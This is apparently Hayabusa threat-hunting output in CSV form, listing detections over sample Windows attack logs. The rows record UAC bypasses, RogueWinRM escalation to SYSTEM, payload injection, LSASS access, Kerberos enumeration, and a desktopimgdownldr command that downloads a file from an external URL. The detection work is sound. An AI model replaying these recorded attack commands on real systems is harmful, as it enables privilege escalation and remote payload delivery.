+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 328 310 0000028A37652590 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 : Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx -2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx -2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: spooler.exe payload.bin : Path: C:\Users\Public\tools\cinj\spooler.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: chost.exe payload.bin : Path: C:\Users\Public\tools\evasion\chost.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Conhost Parent Process Executions,,rules/sigma/process_creation/win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\desktopimgdownldr.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Download LockScreen Image : URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx -2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: explorer.exe /root,""c:\windows\System32\calc.exe"" : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: ECORP\Administrator : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\win32calc.exe"" : Path: C:\Windows\System32\win32calc.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\System32\calc.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx -2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx -2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx -2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx -2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATACORE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PKI01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: EXCHANGE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WSUS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: DHCP01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATANIDS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PRTG-MON$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ADFS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEBIIS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS03VULN$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59919 : LogonID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.334 